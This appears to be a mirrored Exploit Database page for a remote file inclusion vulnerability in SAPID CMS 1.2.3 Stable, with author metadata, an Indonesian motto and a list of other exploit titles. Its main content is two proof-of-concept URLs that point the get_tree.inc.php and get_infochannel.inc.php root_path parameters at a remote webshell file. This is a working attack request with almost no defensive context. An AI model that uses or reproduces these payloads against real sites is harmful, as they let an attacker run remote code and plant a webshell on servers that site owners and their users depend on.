SAPID 1.2.3 Stable – Remote File Inclusion

Exploit Database
90 阅读

作者： Opa Yong

日期： 2012-01-09
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/18342/

# Exploit Title: SAPID Stable (RFI)
# Google Dork: tanyakan pada dan pemula :D
# Date: January 08 2011
# Author: Opa Yong
# Software Link: http://sourceforge.net/projects/sapid/files/sapid-cms/
# Version: SAPID 1.2.3 Stable
# Tested on: Windows XP Home Edition SP2


@POC: http://127.0.1/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[webshell.txt?]
@POC: http://127.0.1/usr/extensions/get_infochannel.inc.php?root_path=[webshell.txt?]


Pesan: Jangan pernah mengaku diri anda hacker,lebih baik orang yg di sekitar anda yg mengaku anda itu adalah hacker.


Special thanks for Dan Pemula

last Exploits
SAPID 1.2.3 Stable – Remote File Inclusion的更多信息

SonicWALL CDP 5040 6.x – Multiple Vulnerabilities：
WordPress Core 4.7.0/4.7.1 – Content Injection：
WordPress Plugin Easy Contact Form Lite 1.0.7 – SQL Injection：
ImagoScripts Deviant Art Clone – SQL Injection：
Observium 0.16.7533 – Cross-Site Request Forgery：
Artworks Gallery 1.0 – Arbitrary File Upload RCE (Authenticated) via Edit Profile：
Online Voting System 1.0 – Remote Code Execution (Authenticated)：
Ucenter Projekt 2.0 – Insecure crossdomain (Cross-Site Scripting)：